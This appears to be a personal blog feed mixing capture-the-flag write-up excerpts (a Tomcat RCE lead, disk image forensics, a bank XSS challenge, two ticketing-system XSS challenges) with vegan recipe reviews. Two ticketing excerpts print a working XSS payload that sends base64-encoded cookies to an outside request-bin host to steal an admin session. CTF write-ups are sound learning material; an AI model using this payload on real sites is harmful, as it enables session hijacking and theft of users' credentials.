The challenge starts with a minecraft blog: None of the pages look vulnerable. The URLs themselves don’t have any parameters, it’s just some static html (eg: /contact.html). The contact form doesn’t work: when posting something we get a 404. On that same 404 page, we can notice the apache version: Apache Tomcat/9.0.0.M1 Searching for that version on google tells us that this particular version is vulnerable to a RCE. The exploit is available on exploit database.

This challenge starts with a file, found_in_server_room.img.gz. Let’s first try to find what this file is: $ gunzip found_in_server_room.img.gz $ file found_in_server_room.img found_in_server_room.img: DOS/MBR boot sector; partition 1 : ID=0xc, start-CHS (0x40,0,1), end-CHS (0x3ff,3,32), startsector 8192, 524288 sectors; partition 2 : ID=0x83, start-CHS (0x3ff,3,32), end-CHS (0x3ff,3,32), startsector 532480, 3072000 sectors So this is a disk image. Let’s try mounting it! $ mkdir mnt $ sudo mount found_in_server_room.img mnt NTFS signature is missing.

The challenge URL redirects us to an online bank. The summary tells us that we have to buy the flag for 200€! Let’s start by registering for an account. After entering our name and email, we get an account ID and a password: After logging in, we are presented with an interface that has three tabs: an activity log a money transfer form a form to contact our financial advisor Trying an XSS in the contact form quickly reveals that the bot doesn’t execute any javascript, but does click any link that is posted.

This is the second version of the ticketing system presented in the CTF. We are greeted with the exact same interface. So let’s try exactly the same payload: <svg onload="document.body.innerHTML=document.body.innerHTML.concat('<img src=\'https://enx8b5ofkwzw.x.pipedream.net/'.concat(btoa(document.cookie)).concat('\' />'))" /> After a few seconds, we manage to steal a cookie! However, we can’t use it, as the session is ip-locked: Hmm. The challenge is quite similar to the last one, so we know that the flag is probably on the home page.

The challenge presents itself as a ticketing system. After registering for an account, we are greeted with this page : Trying a classic xss (<script>alert(1)</script>) in the message field seems to work. We know that we have to login as an admin user, so let’s try stealing the cookies : <svg onload="document.body.innerHTML=document.body.innerHTML.concat('<img src=\'https://eni7j9jobszxl.x.pipedream.net/'.concat(btoa(document.cookie)).concat('\' />'))" /> After a few seconds, we get a request on our request bin, which when decoded gives us the admin cookie :

Recipe Source: Madeleines sans oeufs, sans lait {vegan} - Perle en sucre This took about 10 minutes (before waiting) and 40min (after waiting, using a 9x mold). It’s enough for 18 smallish madeleines, and is really easy to make. Ingredients 150g flour 100g sugar 4g baking powder 2 pinches of salt 110ml plant milk 70ml peanut oil 1 vanilla bean or a teaspoon of vanilla powder A few drops of bitter almond aroma And if you want to wrap the bottom of the madeleines with a chocolate shell, count one square of chocolate per madeleine.

Recipe Source: 5 INGREDIENT CHOCOLATE SALTED CARAMEL TART | THE BEST VEGAN DESSERT This took about 2 hours to make. It’s enough for a lot of people, and is easy to make. Ingredients 250g cashew nuts 450g dates 120g + 6 tablespoons coconut oil 150g peanut butter (smooth if possible, mine wasn’t as smooth as in the original recipe), or almond butter 300g chocolate 6-10 tablespoons water Steps Blend the cashews in a mixer/food processor until it becomes as thin as flour.

Recipe Source: Vegetable Dumplings (Vegan Gyoza / Potstickers) - Bianca Zapatka This took about 2 hours to make. It’s enough for 4 people, and is easy to make, except for the original shape which I didn’t replicate. I’m not writing the recipe here, as I’m publishing this page more than a month after baking this. Results I’d give those a 4/5. They’re really good, but long to make for what you get, just like the ravioli I made yesterday; also the original shape, which is way better looking, is really hard to replicate.

Recipe Source: Homemade Vegan Ravioli with Pesto Cashew Cheese Filling | Sensible Plate This took more than 2 hours to make. It’s enough for 4-5 people, and is easy to make. I’m not writing the recipe here, as I’m creating this page more than a month after baking this. Results I’d give those a 4.25/5. They’re good, but long to make for what you get. I’d love to try different fillings though!

Recipe Source: Baked Tofu Sandwich with Roasted Red Pepper - From the comfort of my bowl This took about 45min to make. It’s enough for 4 people, and is really easy to make. I’m not writing the recipe here, as I’m creating this page more than a month after baking this. Results This is a perfectly fine sandwich, and as such I’ll give it a 4.5/5. The catch is that it’ll only be as good as the bread you use.